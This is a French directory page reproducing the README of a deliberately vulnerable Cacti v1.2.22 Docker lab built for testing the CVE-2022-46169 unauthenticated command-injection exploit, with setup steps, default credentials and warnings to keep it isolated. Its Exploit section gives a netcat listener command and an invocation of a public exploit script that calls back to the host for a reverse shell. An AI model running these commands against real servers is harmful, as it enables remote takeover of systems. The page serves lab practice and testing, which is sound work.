Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — AVERTISSEMENT : Ceci est une application vulnérable permettant de tester l'exploit de l'injection de commande Cacti (CVE-2022-46169). Exécutez-la à vos propres risques ! | Kitploit
Outils/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleLabs et Pratique
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

AVERTISSEMENT : Ceci est une application vulnérable permettant de tester l'exploit de l'injection de commande Cacti (CVE-2022-46169). Exécutez-la à vos propres risques !

Voir le dépôt
123il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cacti v1.2.22 - application vulnérable à l'injection de commande (CVE-2022-46169)

Ceci est une application vulnérable permettant de tester l'exploit de la vulnérabilité Cacti (CVE-2022-46169).

AVERTISSEMENT !

Cette application contient de sérieuses vulnérabilités de sécurité. Exécutez-la à vos risques et périls ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (comme une machine virtuelle avec un instantané récent et un réseau host-only). Ne téléversez pas cette application sur des serveurs exposés à Internet, car ils seraient compromis.

AVERTISSEMENT: Je ne suis pas responsable de la manière dont quiconque utilise cette application. L'unique but de cette application est de servir de scénario de test pour l'exploit de la CVE-2022-46169 et elle ne doit pas être utilisée de manière malveillante. Si votre serveur est compromis par une installation de cette application, ce n'est pas ma responsabilité, mais celle de la ou des personnes qui l'ont téléversée et installée.

Informations sur la vulnérabilité

  • CVE-ID : CVE-2022-46169
  • Lien : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Description : Dans les versions concernées, une vulnérabilité d'injection de commande permet à un utilisateur non authentifié d'exécuter du code arbitraire sur un serveur exécutant Cacti, si une source de données spécifique a été sélectionnée pour un équipement surveillé.

Utilisation

Voici les étapes pour configurer l'environnement :

  1. Lancez docker compose up -d pour démarrer la composition.
  2. Vous pouvez finaliser les étapes en vous rendant sur http://127.0.0.1/cacti pour démarrer l'assistant d'initialisation de Cacti. Si vous obtenez une erreur concernant la base de données, patientez un peu et actualisez la page.
  3. Les identifiants par défaut sont admin/admin.
  4. Cliquez sur « Next » pour tous les boutons de l'assistant, en choisissant les options en conséquence. Tous les paramètres par défaut devraient convenir et tous les prérequis obligatoires devraient être satisfaits.
  5. Après l'installation, vous devez configurer un nouveau graphe :
    1. Cliquez sur « Create graphs ».
    2. Dans la section « Graph Templates », dans le menu déroulant à côté de « Create », sélectionnez : « Device - Uptime ».
    3. Cliquez sur le bouton « Create ».

Le conteneur s'appellera vuln-cacti.

Pour supprimer l'environnement, utilisez la commande docker compose down.

Le guide d'installation officiel de Cacti est disponible ici.

Cause racine

Une analyse détaillée de la cause racine de la vulnérabilité est disponible ici.

Exploit

Un exploit public est disponible sur Exploit-DB. Il a été copié dans le dossier exploit/ pour plus de simplicité.

Pour l'exécuter :

  1. Utilisez netcat sur la machine hôte pour écouter les connexions entrantes.
    root@kitploit:~
    nc -lvp 6669
    
  2. Lancez l'exploit.
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Astuce : host.docker.internal est utilisé pour atteindre la machine hôte depuis le conteneur (référence).

Il existe également une entrée dans le dépôt vulhub.

Auteurs

  • Antonio Francesco Sardella - implémentation - m3ssap0

Licence

Ce projet est sous licence Unlicense - voir le fichier LICENSE pour plus de détails.

Remerciements

  • Stefan Schiller, le chercheur en sécurité qui a découvert la vulnérabilité.
  • Riadh Bouchahoua, le développeur de l'exploit.
Télécharger l’outil